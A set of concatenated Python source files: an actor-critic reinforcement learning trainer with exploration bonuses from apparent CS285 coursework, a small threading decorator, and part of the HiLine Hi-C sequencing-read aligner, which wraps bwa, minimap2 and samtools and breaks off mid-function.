############################### Building Critic ##############################
def _build_critic(self):
# define the critic
self._critic_prediction = MLP(self.ob_dim, 1, self.n_layers, self.size).to(self.device)
self.critic_prediction = lambda ob: torch.squeeze(self._critic_prediction(ob))
# use the AdamOptimizer to optimize the loss defined above
self.critic_optimizer = torch.optim.Adam(self._critic_prediction.parameters(), lr=self.learning_rate)
def _sample_action(self, observation):
""" Constructs a symbolic operation for stochastically sampling from the policy
distribution
arguments:
policy_parameters
if discrete: logits of a categorical distribution over actions
sy_probs_na: (batch_size, self.ac_dim)
if continuous: (mean, log_std) of a Gaussian distribution over actions
sy_mean: (batch_size, self.ac_dim)
sy_logstd: (self.ac_dim,)
returns:
sy_sampled_ac:
if discrete: (batch_size)
if continuous: (batch_size, self.ac_dim)
Hint: for the continuous case, use the reparameterization trick:
The output from a Gaussian distribution with mean 'mu' and std 'sigma' is
mu + sigma * z, z ~ N(0, I)
This reduces the problem to just sampling z. (Hint: use tf.random_normal!)
"""
if self.discrete:
sy_probs_na = self.policy_parameters
sample_ac = torch.squeeze(torch.multinomial(sy_probs_na(observation), num_samples=1), dim=1) # BUG maybe bug happens here
else:
sy_mean, sy_logstd = self.policy_parameters
probs_out = sy_mean(observation)
sample_ac = probs_out + torch.exp(sy_logstd) * torch.randn(probs_out.size(), device=self.device) # BUG
return sample_ac
@convert_args_to_tensor()
def get_action(self, obs):
with torch.no_grad():
if len(obs.shape)>1:
observation = obs.to(self.device)
else:
observation = obs[None].to(self.device)
# observation = torch.from_numpy(observation).type(torch.FloatTensor)
# TODO return the action that the policy prescribes
# HINT1: you will need to call self.sess.run
# HINT2: the tensor we're interested in evaluating is self.sample_ac
# HINT3: in order to run self.sample_ac, it will need observation fed into the feed_dict
return self._sample_action(observation).cpu().numpy()
def sample_trajectories(self, itr, env):
# Collect paths until we have enough timesteps
timesteps_this_batch = 0
paths = []
while True:
animate_this_episode=(len(paths)==0 and (itr % 10 == 0) and self.animate)
path = self.sample_trajectory(env, animate_this_episode)
paths.append(path)
timesteps_this_batch += pathlength(path)
if timesteps_this_batch > self.min_timesteps_per_batch:
break
return paths, timesteps_this_batch
def sample_trajectory(self, env, animate_this_episode):
ob = env.reset()
obs, acs, rewards, next_obs, terminals = [], [], [], [], []
steps = 0
while True:
if animate_this_episode:
env.render()
time.sleep(0.1)
obs.append(ob)
ac = self.get_action(ob)
ac = ac[0]
acs.append(ac)
ob, rew, done, _ = env.step(ac)
next_obs.append(ob)
rewards.append(rew)
steps += 1
if done or steps > self.max_path_length:
terminals.append(1)
break
else:
terminals.append(0)
path = {"observation" : np.array(obs, dtype=np.float32),
"reward" : np.array(rewards, dtype=np.float32),
"action" : np.array(acs, dtype=np.float32),
"next_observation": np.array(next_obs, dtype=np.float32),
"terminal": np.array(terminals, dtype=np.float32)}
return path
@convert_args_to_tensor()
def critic_forward(self, ob, get_torch=False):
# run your critic
with torch.no_grad():
if get_torch:
return self.critic_prediction(ob)
ob = ob.to(self.device)
return self.critic_prediction(ob).cpu().numpy()
def estimate_advantage(self, ob_no, next_ob_no, re_n, terminal_n):
"""
Estimates the advantage function value for each timestep.
let sum_of_path_lengths be the sum of the lengths of the paths sampled from
Agent.sample_trajectories
arguments:
ob_no: shape: (sum_of_path_lengths, ob_dim)
next_ob_no: shape: (sum_of_path_lengths, ob_dim). The observation after taking one step forward
re_n: length: sum_of_path_lengths. Each element in re_n is a scalar containing
the reward for each timestep
terminal_n: length: sum_of_path_lengths. Each element in terminal_n is either 1 if the episode ended
at that timestep of 0 if the episode did not end
returns:
adv_n: shape: (sum_of_path_lengths). A single vector for the estimated
advantages whose length is the sum of the lengths of the paths
"""
adv_n = re_n - self.critic_forward(ob_no) + self.gamma*self.critic_forward(next_ob_no) * np.logical_not(terminal_n)
if self.normalize_advantages:
adv_n = (adv_n - np.mean(adv_n)) / (np.std(adv_n) + 1e-8)
return adv_n
@convert_args_to_tensor()
def update_critic(self, ob_no, next_ob_no, re_n, terminal_n):
"""
Update the parameters of the critic.
let sum_of_path_lengths be the sum of the lengths of the paths sampled from
Agent.sample_trajectories
let num_paths be the number of paths sampled from Agent.sample_trajectories
arguments:
ob_no: shape: (sum_of_path_lengths, ob_dim)
next_ob_no: shape: (sum_of_path_lengths, ob_dim). The observation after taking one step forward
re_n: length: sum_of_path_lengths. Each element in re_n is a scalar containing
the reward for each timestep
terminal_n: length: sum_of_path_lengths. Each element in terminal_n is either 1 if the episode ended
at that timestep of 0 if the episode did not end
returns:
nothing
"""
ob_no, next_ob_no, re_n, terminal_n = \
[x.to(self.device) for x in [ob_no, next_ob_no, re_n, terminal_n]]
for i in range(self.num_grad_steps_per_target_update * self.num_target_updates):
if i % self.num_grad_steps_per_target_update == 0:
target_values = re_n + self.gamma*self.critic_forward(next_ob_no, get_torch=True) * torch.logical_not(terminal_n)
self.critic_optimizer.zero_grad()
loss = self.mse_criterion(self.critic_prediction(ob_no), target_values)
loss.backward()
self.critic_optimizer.step()
@convert_args_to_tensor()
def update_actor(self, ob_no, ac_na, adv_n):
"""
Update the parameters of the policy.
arguments:
ob_no: shape: (sum_of_path_lengths, ob_dim)
ac_na: shape: (sum_of_path_lengths).
adv_n: shape: (sum_of_path_lengths). A single vector for the estimated
advantages whose length is the sum of the lengths of the paths
returns:
nothing
"""
observations, acs_na, adv_n = \
[x.to(self.device) if x is not None else None for x in [ob_no, ac_na, adv_n]]
self.actor_optimizer.zero_grad()
logprob_n = self._define_log_prob(observations, acs_na)
loss = -1 * torch.sum(logprob_n * adv_n)
loss.backward()
self.actor_optimizer.step()
def train_AC(
exp_name,
env_name,
n_iter,
gamma,
min_timesteps_per_batch,
max_path_length,
learning_rate,
num_target_updates,
num_grad_steps_per_target_update,
animate,
logdir,
normalize_advantages,
seed,
n_layers,
size,
########################################################################
# Exploration args
bonus_coeff,
kl_weight,
density_lr,
density_train_iters,
density_batch_size,
density_hiddim,
dm,
replay_size,
sigma,
########################################################################
):
start = time.time()
#========================================================================================#
# Set Up Logger
#========================================================================================#
setup_logger(logdir, locals())
#========================================================================================#
# Set Up Env
#========================================================================================#
# Make the gym environment
########################################################################
# Exploration
if env_name == 'PointMass-v0':
from pointmass import PointMass
env = PointMass()
else:
env = gym.make(env_name)
dirname = logz.G.output_dir
########################################################################
# Set random seeds
tf.set_random_seed(seed)
np.random.seed(seed)
env.seed(seed)
# Maximum length for episodes
max_path_length = max_path_length or env.spec.max_episode_steps
# Is this env continuous or discrete?
discrete = isinstance(env.action_space, gym.spaces.Discrete)
# Observation and action sizes
ob_dim = env.observation_space.shape[0]
ac_dim = env.action_space.n if discrete else env.action_space.shape[0]
#========================================================================================#
# Initialize Agent
#========================================================================================#
computation_graph_args = {
'n_layers': n_layers,
'ob_dim': ob_dim,
'ac_dim': ac_dim,
'discrete': discrete,
'size': size,
'learning_rate': learning_rate,
'num_target_updates': num_target_updates,
'num_grad_steps_per_target_update': num_grad_steps_per_target_update,
}
sample_trajectory_args = {
'animate': animate,
'max_path_length': max_path_length,
'min_timesteps_per_batch': min_timesteps_per_batch,
}
estimate_advantage_args = {
'gamma': gamma,
'normalize_advantages': normalize_advantages,
}
agent = Agent(computation_graph_args, sample_trajectory_args, estimate_advantage_args) #estimate_return_args
# build computation graph
agent.build_computation_graph()
########################################################################
# Initalize exploration density model
if dm != 'none':
if env_name == 'PointMass-v0' and dm == 'hist':
density_model = Histogram(
nbins=env.grid_size,
preprocessor=env.preprocess)
exploration = DiscreteExploration(
density_model=density_model,
bonus_coeff=bonus_coeff)
elif dm == 'rbf':
density_model = RBF(sigma=sigma)
exploration = RBFExploration(
density_model=density_model,
bonus_coeff=bonus_coeff,
replay_size=int(replay_size))
elif dm == 'ex2':
density_model = Exemplar(
ob_dim=ob_dim,
hid_dim=density_hiddim,
learning_rate=density_lr,
kl_weight=kl_weight)
exploration = ExemplarExploration(
density_model=density_model,
bonus_coeff=bonus_coeff,
train_iters=density_train_iters,
bsize=density_batch_size,
replay_size=int(replay_size))
exploration.density_model.build_computation_graph()
else:
raise NotImplementedError
########################################################################
# tensorflow: config, session, variable initialization
agent.init_tf_sess()
########################################################################
if dm != 'none':
exploration.receive_tf_sess(agent.sess)
########################################################################
#========================================================================================#
# Training Loop
#========================================================================================#
total_timesteps = 0
for itr in range(n_iter):
print("********** Iteration %i ************"%itr)
paths, timesteps_this_batch = agent.sample_trajectories(itr, env)
total_timesteps += timesteps_this_batch
# Build arrays for observation, action for the policy gradient update by concatenating
# across paths
ob_no = np.concatenate([path["observation"] for path in paths])
ac_na = np.concatenate([path["action"] for path in paths])
re_n = np.concatenate([path["reward"] for path in paths])
next_ob_no = np.concatenate([path["next_observation"] for path in paths])
terminal_n = np.concatenate([path["terminal"] for path in paths])
########################################################################
# Modify the reward to include exploration bonus
"""
1. Fit density model
if dm == 'ex2':
the call to exploration.fit_density_model should return ll, kl, elbo
else:
the call to exploration.fit_density_model should return nothing
2. Modify the re_n with the reward bonus by calling exploration.modify_reward
"""
old_re_n = re_n
if dm == 'none':
pass
else:
# 1. Fit density model
if dm == 'ex2':
### PROBLEM 3
### YOUR CODE HERE
ll, kl, elbo = exploration.fit_density_model(ob_no)
elif dm == 'hist' or dm == 'rbf':
### PROBLEM 1
### YOUR CODE HERE
exploration.fit_density_model(ob_no)
else:
assert False
# 2. Modify the reward
### PROBLEM 1
### YOUR CODE HERE
re_n = exploration.modify_reward(re_n, ob_no)
print('average state', np.mean(ob_no, axis=0))
print('average action', np.mean(ac_na, axis=0))
# Logging stuff.
# Only works for point mass.
if env_name == 'PointMass-v0':
np.save(os.path.join(dirname, '{}'.format(itr)), ob_no)
########################################################################
agent.update_critic(ob_no, next_ob_no, re_n, terminal_n)
adv_n = agent.estimate_advantage(ob_no, next_ob_no, re_n, terminal_n)
agent.update_actor(ob_no, ac_na, adv_n)
if n_iter - itr < 10:
max_reward_path_idx = np.argmax(np.array([path["reward"].sum() for path in paths]))
print(paths[max_reward_path_idx]['reward'])
# Log diagnostics
returns = [path["reward"].sum() for path in paths]
ep_lengths = [pathlength(path) for path in paths]
logz.log_tabular("Time", time.time() - start)
logz.log_tabular("Iteration", itr)
logz.log_tabular("AverageReturn", np.mean(returns))
logz.log_tabular("StdReturn", np.std(returns))
logz.log_tabular("MaxReturn", np.max(returns))
logz.log_tabular("MinReturn", np.min(returns))
logz.log_tabular("EpLenMean", np.mean(ep_lengths))
logz.log_tabular("EpLenStd", np.std(ep_lengths))
########################################################################
logz.log_tabular("Unmodified Rewards Mean", np.mean(old_re_n))
logz.log_tabular("Unmodified Rewards Std", np.mean(old_re_n))
logz.log_tabular("Modified Rewards Mean", np.mean(re_n))
logz.log_tabular("Modified Rewards Std", np.mean(re_n))
if dm == 'ex2':
logz.log_tabular("Log Likelihood Mean", np.mean(ll))
logz.log_tabular("Log Likelihood Std", np.std(ll))
logz.log_tabular("KL Divergence Mean", np.mean(kl))
logz.log_tabular("KL Divergence Std", np.std(kl))
logz.log_tabular("Negative ELBo", -elbo)
########################################################################
logz.log_tabular("TimestepsThisBatch", timesteps_this_batch)
logz.log_tabular("TimestepsSoFar", total_timesteps)
logz.dump_tabular()
logz.pickle_tf_vars()
def main():
from gym.envs.registration import register
register(
id='sparse-cheetah-cs285-v1',
entry_point='cs285.sparse_half_cheetah:HalfCheetahEnv',
max_episode_steps=1000,
)
from cs285.sparse_half_cheetah import HalfCheetahEnv
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('env_name', type=str)
parser.add_argument('--exp_name', type=str, default='vac')
parser.add_argument('--render', action='store_true')
parser.add_argument('--discount', type=float, default=1.0)
parser.add_argument('--n_iter', '-n', type=int, default=100)
parser.add_argument('--batch_size', '-b', type=int, default=1000)
parser.add_argument('--ep_len', '-ep', type=float, default=-1.)
parser.add_argument('--learning_rate', '-lr', type=float, default=5e-3)
parser.add_argument('--dont_normalize_advantages', '-dna', action='store_true')
parser.add_argument('--num_target_updates', '-ntu', type=int, default=10)
parser.add_argument('--num_grad_steps_per_target_update', '-ngsptu', type=int, default=10)
parser.add_argument('--seed', type=int, default=1)
parser.add_argument('--n_experiments', '-e', type=int, default=1)
parser.add_argument('--n_layers', '-l', type=int, default=2)
parser.add_argument('--size', '-s', type=int, default=32)
########################################################################
parser.add_argument('--bonus_coeff', '-bc', type=float, default=1e-3)
parser.add_argument('--density_model', type=str, default='hist | rbf | ex2 | none')
parser.add_argument('--kl_weight', '-kl', type=float, default=1e-2)
parser.add_argument('--density_lr', '-dlr', type=float, default=5e-3)
parser.add_argument('--density_train_iters', '-dti', type=int, default=1000)
parser.add_argument('--density_batch_size', '-db', type=int, default=64)
parser.add_argument('--density_hiddim', '-dh', type=int, default=32)
parser.add_argument('--replay_size', '-rs', type=int, default=int(1e6))
parser.add_argument('--sigma', '-sig', type=float, default=0.2)
########################################################################
args = parser.parse_args()
data_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'data')
if not (os.path.exists(data_path)):
os.makedirs(data_path)
logdir = 'ac_' + args.exp_name + '_' + args.env_name + '_' + time.strftime("%d-%m-%Y_%H-%M-%S")
logdir = os.path.join(data_path, logdir)
if not(os.path.exists(logdir)):
os.makedirs(logdir)
max_path_length = args.ep_len if args.ep_len > 0 else None
processes = []
for e in range(args.n_experiments):
seed = args.seed + 10*e
print('Running experiment with seed %d'%seed)
def train_func():
train_AC(
exp_name=args.exp_name,
env_name=args.env_name,
n_iter=args.n_iter,
gamma=args.discount,
min_timesteps_per_batch=args.batch_size,
max_path_length=max_path_length,
learning_rate=args.learning_rate,
num_target_updates=args.num_target_updates,
num_grad_steps_per_target_update=args.num_grad_steps_per_target_update,
animate=args.render,
logdir=os.path.join(logdir,'%d'%seed),
normalize_advantages=not(args.dont_normalize_advantages),
seed=seed,
n_layers=args.n_layers,
size=args.size,
########################################################################
bonus_coeff=args.bonus_coeff,
kl_weight=args.kl_weight,
density_lr=args.density_lr,
density_train_iters=args.density_train_iters,
density_batch_size=args.density_batch_size,
density_hiddim=args.density_hiddim,
dm=args.density_model,
replay_size=args.replay_size,
sigma=args.sigma
########################################################################
)
if args.n_experiments > 1:
# # Awkward hacky process runs, because Tensorflow does not like
# # repeatedly calling train_AC in the same thread.
p = Process(target=train_func, args=tuple())
p.start()
processes.append(p)
# if you comment in the line below, then the loop will block
# until this process finishes
# p.join()
else:
train_func()
for p in processes:
p.join()
if __name__ == "__main__":
main()
|
decorators.py
|
"""
decorators.py: Custom decorators
__author__ = "Fernando P. Lopes"
__email__ = "fpedrosa@gmail.com"
"""
from threading import Thread
def async_decorator(f):
def wrapper(*args, **kwargs):
thr = Thread(target=f, args=args, kwargs=kwargs)
thr.start()
return wrapper
|
aligner.py
|
# Copyright (c) 2020 Ed Harry, Wellcome Sanger Institute
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import logging
import sys
import click
import hashlib
import re
import gzip
import os
import warnings
from os import makedirs
from os.path import isdir, isfile, join, basename, normpath, realpath, dirname
from subprocess import Popen, PIPE, STDOUT, check_output
from enum import Enum, auto
from Bio import SeqIO
from Bio.SeqRecord import SeqRecord
from tempfile import NamedTemporaryFile
from binascii import hexlify
from threading import Thread
from pathlib import Path
from HiLine import version
from HiLine import Pipeline as pl
from _Aligner import _Aligner_Main
NAME = "_HiLine_Aligner"
DESCRIPTION = "Restriction digest aware HiC aligner. Part of HiLine."
LICENCE = "Copyright (c) 2020 Ed Harry, Wellcome Sanger Institute."
logger = logging.getLogger(__name__)
def create_logger_handle(stream, typeid, level):
class LogFilter(logging.Filter):
def __init__(self, level):
super().__init__()
self.__level = level
def filter(self, record):
return record.levelno == self.__level
handle = logging.StreamHandler(stream=stream)
handle.setLevel(level=level)
handle.setFormatter(
logging.Formatter("[Aligner {id}] :: %(message)s".format(id=typeid))
)
handle.addFilter(LogFilter(level=level))
return handle
class LoggerHandle(object):
def __init__(self):
self.threadsAndHandles = []
def add_logger(self, log_func, id):
read, write = os.pipe()
def _thread_func():
with os.fdopen(read, encoding="utf-8", errors="replace") as file:
for line in file:
log_func("({id}) {mess}".format(id=id, mess=line[:-1]))
thread = Thread(target=_thread_func)
thread.start()
self.threadsAndHandles.append((thread, write))
return write
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
for thread, handle in self.threadsAndHandles:
os.close(handle)
thread.join()
def documenter(docstring):
def inner_documenter(f):
f.__doc__ = docstring
return f
return inner_documenter
@click.command()
@documenter(
"""
{name} {ver}. {des}
{lic}
""".format(
name=NAME, ver=version, des=DESCRIPTION, lic=LICENCE
)
)
@click.argument("reference", type=click.Path(exists=True))
@click.argument("reads", type=click.File("rb", lazy=False), nargs=-1)
@click.option("--site", type=(str, int, int), multiple=True)
@click.option(
"-t",
"--threads",
type=click.IntRange(2, None, clamp=True),
default=2,
)
@click.option("--tag", type=str, multiple=True)
@click.option("--trim/--no-trim", default=True)
@click.option("--bwa1", "aligner", flag_value=1)
@click.option("--bwa2", "aligner", flag_value=2, default=True)
@click.option("--minimap2", "aligner", flag_value=3, default=True)
@click.option("--align/--no-align", default=True)
def cli(reference, reads, site, threads, tag, trim, aligner, align):
logger.setLevel(logging.INFO)
logger.addHandler(
create_logger_handle(stream=sys.stderr, typeid="status", level=logging.INFO)
)
logger.addHandler(
create_logger_handle(stream=sys.stderr, typeid="error", level=logging.ERROR)
)
logger.addHandler(
create_logger_handle(stream=sys.stderr, typeid="warning", level=logging.WARNING)
)
def _showwarning(message, category, filename, lineno, file=None, line=None):
logger.warning(
f"[{filename} {lineno}] {message}"
if line is None
else f"[{filename} {lineno}] {message} {line}"
)
warnings.showwarning = _showwarning
if len(site) == 0 and trim:
logger.warning("No restriction sites specified, turning off trimming")
trim = False
if not (3 > len(reads) > 0):
raise click.BadArgumentUsage("only one or two read sources accepted")
class Aligner(object):
class Site(object):
class Overhang(Enum):
FIVE = auto()
THREE = auto()
BLUNT = auto()
@classmethod
def get(cls, fwd, rev):
if fwd < rev:
return cls.FIVE
elif rev < fwd:
return cls.THREE
else:
return cls.BLUNT
def __init__(self, site, fwd, rev):
self.site = site
self.fwd = fwd
self.rev = rev
if fwd < 0 or rev < 0:
raise click.BadOptionUsage(
"site fwd and rev locations must be non-negative integers"
)
self.cut_start = min(fwd, rev)
self.cut_end = max(fwd, rev)
self.overhang = self.Overhang.get(fwd, rev)
def __str__(self):
return ",".join((self.site, str(self.fwd), str(self.rev)))
def __init__(
self, aligner, trim, reference, reads, sites, threads, sam_tags, align
):
self.trim = trim
self.reference = reference
self.reads_from_stdin = "<stdin>" in [read.name for read in reads]
self.sites = [self.Site(*site) for site in sites]
self.sam_tags = sam_tags
self.threads = threads
self.align = align
self.name = self.reference + "." + str(self.hash) + ".HiLine_Reference"
self.aligner = self.get_aligner(
threads=threads // 2 if trim else threads,
reads=["-" if read.name == "<stdin>" else read.name for read in reads],
version=aligner,
)
@staticmethod
def get_aligner(threads, reads, version):
class Aligner(object):
def index_command(self, fasta, prefix=None):
if prefix is None:
prefix = basename(normpath(fasta))
prefix += "." + self.program_name
return self.program_name + " index -p " + prefix + " " + fasta
def run_command(self, reference, stdin=False):
return (
self.program_name
+ " mem -5SPYC{p} -t {threads} -B 8 {ref} {r1}{r2}".format(
p="p" if stdin else ("p" if len(reads) == 1 else ""),
threads=threads,
ref=reference + "." + self.program_name,
r1="-" if stdin else reads[0],
r2=""
if stdin
else (" " + reads[1] if len(reads) == 2 else ""),
)
)
def run_process(self, reference, stdin=None, stderr=None, stdout=None):
return Popen(
self.run_command(
reference=reference, stdin=stdin is not None
).split(),
stderr=stderr,
stdout=stdout,
stdin=stdin,
)
class Bwa1(Aligner):
program_name = "bwa"
index_extensions = ("amb", "ann", "bwt", "pac", "sa")
class Bwa2(Aligner):
program_name = "bwa-mem2"
index_extensions = (
"0123",
"amb",
"ann",
"bwt.2bit.64",
"pac",
)
class MiniMap2:
program_name = "minimap2"
index_extensions = ("index",)
def index_command(self, fasta, prefix=None):
if prefix is None:
prefix = basename(normpath(fasta))
prefix += "." + self.program_name
return (
self.program_name
+ " -t "
+ str(threads)
+ " -d "
+ prefix
+ "."
+ self.index_extensions[0]
+ " "
+ "-x sr "
+ fasta
)
def run_process(self, reference, stdin=None, stderr=None, stdout=None):
return Popen(
[
"gawk",
"-v",
"FS=\t",
"-v",
"OFS=\t",
"{if ($1 ~ /^@/) {print($0)} else {$2=and($2,compl(2048)); print(substr($0,2))}}",
],
stdout=stdout,
stderr=stderr,
stdin=Popen(
[
"perl",
str(
Path(dirname(realpath(__file__)))
/ "filter_five_end.pl"
),
],
stdout=PIPE,
stderr=stderr,
stdin=Popen(
[
"gawk",
"{if ($1 ~ /^@/) {print($0)} else if (and($2,64)>0) {print(1$0)} else {print(2$0)}}",
],
stdout=PIPE,
stderr=stderr,
stdin=Popen(
(
self.program_name
+ " -yYt "
+ str(threads)
+ " -ax sr "
+ reference
+ "."
+ self.program_name
+ "."
+ self.index_extensions[0]
+ " "
+ ("-" if stdin is not None else reads[0])
+ (
""
if stdin is not None
else (
(" " + reads[1])
if len(reads) == 2
else ""
)
)
).split(),
stdin=stdin,
stdout=PIPE,
stderr=stderr,
).stdout,
).stdout,
).stdout,
)
if version == 3:
try:
with Popen(
"minimap2 --version".split(), stdout=PIPE, stderr=STDOUT
) as process:
output = "".join(
[
line.decode("utf-8")
for line in process.stdout.readlines()
]
)
match = re.search(
r"(?P<major>\d+)\.(?P<minor1>\d+)-r(?P<minor2>\d+)",
output,
)
if match is None:
raise Exception("Could not determine 'minimap2' version")
major = int(match.group("major"))
minor1 = int(match.group("minor1"))
minor2 = int(match.group("minor2"))
if not (
major > 2
or (major == 2 and minor1 > 17)
or (major == 2 and minor1 == 17 and minor2 >= 941)
):
raise Exception(
"'minimap2' version {major}.{minor1}-r{minor2} found, version 2.17-r941 or greater required".format(
major=major, minor1=minor1, minor2=minor2
)
)
logger.info("Using minimap2")
return MiniMap2()
except Exception as ex:
sys.exit(str(ex))
try:
if version == 1:
raise FileNotFoundError("bwa 1 selected")
with Popen(
"bwa-mem2 version".split(), stdout=PIPE, stderr=STDOUT
) as process:
output = "".join(
line.decode("utf-8") for line in process.stdout.readlines()
)
match = re.search(
r"(?P<major>\d+)\.(?P<minor1>\d+)\.?(?P<minor2>\d*)", output
)
if match is None:
raise FileNotFoundError("Could not determine 'bwa-mem2' version")
major = int(match.group("major"))
if not (major >= 2):
raise FileNotFoundError(
"Only 'bwa-mem2' version 2 or higher supported"
)
logger.info("Using bwa-mem2")
return Bwa2()
except FileNotFoundError as ex:
logger.info(str(ex))
try:
with Popen("bwa", stdout=PIPE, stderr=STDOUT) as process:
output = "".join(
[
line.decode("utf-8")
for line in process.stdout.readlines()
]
)
match = re.search(
r"Version: (?P<major>\d+)\.(?P<minor1>\d+)\.(?P<minor2>\d+)",
output,
)
if match is None:
raise Exception("Could not determine 'bwa' version")
major = int(match.group("major"))
minor1 = int(match.group("minor1"))
minor2 = int(match.group("minor2"))
if not (
major > 0
or (major == 0 and minor1 > 7)
or (major == 0 and minor1 == 7 and minor2 >= 17)
):
raise Exception(
"'bwa' version {major}.{minor1}.{minor2} found, version 0.7.17 or greater required".format(
major=major, minor1=minor1, minor2=minor2
)
)
logger.info("Using bwa")
return Bwa1()
except Exception as ex:
sys.exit(str(ex))
def digest(self, record):
cuts = [
(0, self.Site.Overhang.BLUNT, ""),
(len(record), self.Site.Overhang.BLUNT, ""),
]
for site in self.sites:
for match in re.finditer(site.site, str(record.seq)):
cuts.append(
(
match.start() + site.fwd,
site.overhang,
match.group()[site.cut_start : site.cut_end],
)
)
cuts.sort(key=lambda cut: cut[0])
for cut_start, cut_end in zip(cuts[:-1], cuts[1:]):
overhang_start = (
cut_start[2] if cut_start[1] == self.Site.Overhang.THREE else ""
)
overhang_end = (
cut_end[2] if cut_end[1] == self.Site.Overhang.FIVE else ""
)
yield SeqRecord(
overhang_start
+ record.seq[cut_start[0] : cut_end[0]]
+ overhang_end,
id=record.id
+ "_"
+ str(cut_start[0])
+ "_"
+ str(len(cut_start[2]))
+ ("+" if cut_start[1] == self.Site.Overhang.THREE else "-")
+ "_"
+ str(len(cut_end[2]))
+ ("+" if cut_end[1] == self.Site.Overhang.FIVE else "-"),
description="",
name="",
)
logger.info(
"{id} digested into {n} fragments".format(id=record.id, n=len(cuts) - 1)
)
def index(self, logger_handle):
threads = []
if self.trim and not (
isdir(self.name)
and all(
isfile(
join(self.name, "ref." + self.aligner.program_name + "." + ext)
)
for ext in self.aligner.index_extensions
)
):
logger.info("Creating virtual digestion index...")
def thread_fn():
def get_open(reference):
with open(reference, "rb") as file:
return (
gzip.open(reference, "rt")
if hexlify(file.read(2)) == b"1f8b"
else open(reference)
)
makedirs(self.name, exist_ok=True)
with NamedTemporaryFile(
mode="w", buffering=True, suffix="", prefix="ref", dir=self.name
) as tmp_file:
with get_open(self.reference) as ref_file:
for rec in SeqIO.parse(ref_file, "fasta"):
for digest_rec in self.digest(rec):
SeqIO.write(digest_rec, tmp_file, "fasta")
handle = logger_handle.add_logger(
logger.info, "index digestion fragments"
)
with Popen(
self.aligner.index_command(
prefix="ref", fasta=tmp_file.name
).split(),
cwd=self.name,
stderr=handle,
stdout=handle,
) as process:
process.communicate()
thread = Thread(target=thread_fn)
thread.start()
threads.append(thread)
if not (
all(
isfile(self.reference + "." + self.aligner.program_name + "." + ext)
for ext in self.aligner.index_extensions
)
):
logger.info("Creating reference index...")
def thread_fn():
handle = logger_handle.add_logger(logger.info, "index reference")
with Popen(
self.aligner.index_command(fasta=self.reference).split(),
stderr=handle,
stdout=handle,
) as process:
process.communicate()
thread = Thread(target=thread_fn)
thread.start()
threads.append(thread)
for thread in threads:
thread.join()
logger.info("Indexing finished")
def run(self):
try:
try:
match = re.match(
r"^samtools (?P<major>\d+)\.(?P<minor>\d+)",
check_output(
"samtools --version".split(), stderr=STDOUT
).decode("utf-8"),
)
if match is None:
raise Exception("Could not determine 'samtools' version")
major = int(match.group("major"))
minor = int(match.group("minor"))
if not (major > 1 or (major == 1 and minor >= 10)):
raise Exception(
"'samtools' version {major}.{minor} found, version 1.10 or greater required".format(
major=major, minor=minor
)
)
samtools_version = "{major}.{minor}".format(
major=major, minor=minor
)
except FileNotFoundError:
raise Exception("'samtools' not found on $PATH")
except Exception as ex:
sys.exit(str(ex))
with LoggerHandle() as logger_handle:
self.index(logger_handle)
if self.align:
if self.trim:
handle = logger_handle.add_logger(
logger.info, "digestion fragment alignment"
)
with Popen(
"samtools view -@ {threads} -hF 0x900 -".format(
threads=self.threads
).split(),
stdout=PIPE,
stderr=handle,
stdin=self.aligner.run_process(
reference=join(self.name, "ref"),
stderr=handle,
stdout=PIPE,
stdin=sys.stdin if self.reads_from_stdin else None,
).stdout,
) as view_process:
read_, write_ = os.pipe()
def main_fn():
class RunParams(object):
samInput = view_process.stdout
samOutput = write_
nThreads = self.threads
info = logger_handle.add_logger(
logger.info, "read trimming"
)
error = logger_handle.add_logger(
logger.error, "read trimming"
)
_Aligner_Main(params=RunParams())
os.close(write_)
thread = Thread(target=main_fn)
thread.start()
threads = [thread]
read, write = os.pipe()
global seen_header
seen_header = False
global pg_lines
pg_lines = []
def thread_fn():
global seen_header
global pg_lines
with os.fdopen(write, "wb") as f_out, os.fdopen(
read_, "rb"
) as f_in:
for line in f_in:
if not seen_header:
if (
decoded_line := line.decode(
"utf-8", errors="replace"
)
).startswith("@"):
if decoded_line.startswith("@PG"):
pg_lines.append(line)
else:
seen_header = True
f_out.write(line)
thread = Thread(target=thread_fn)
thread.start()
threads.append(thread)
samtools_fastq_cmd = "samtools fastq -@ {threads} -t{tags} -0 /dev/null -F 0x900 -".format(
tags=""
if len(self.sam_tags) == 0
else "T {tg}".format(
tg=",".join(t for t in self.sam_tags)
),
threads=self.threads,
)
handle = logger_handle.add_logger(
logger.info, "reference alignment"
)
with self.aligner.run_process(
reference=self.reference,
stdout=PIPE,
stderr=handle,
stdin=Popen(
samtools_fastq_cmd.split(),
stdout=PIPE,
stderr=handle,
stdin=read,
).stdout,
) as aligner_process:
def thread_fn_2():
global seen_header
global pg_lines
local_pg_lines = []
header_buffer = []
header_mode = True
for line in aligner_process.stdout:
if header_mode:
if (
decoded_line := line.decode(
"utf-8", errors="replace"
)
).startswith("@"):
if decoded_line.startswith("@PG"):
local_pg_lines.append(line)
else:
header_buffer.append(line)
else:
header_mode = False
while not seen_header:
pass
chain = pl.SamPGChain(pg_lines)
chain.append(
"@PG\tID:{id}\tPN:{pn}\tCL:{cl}\tDS:{ds}\tVN:{vn}\n".format(
id=NAME,
pn=NAME,
cl=" ".join(
[
basename(
normpath(
sys.argv[0]
)
)
]
+ sys.argv[1:]
),
vn=version,
ds=DESCRIPTION,
).encode(
"utf-8"
)
)
chain.append(
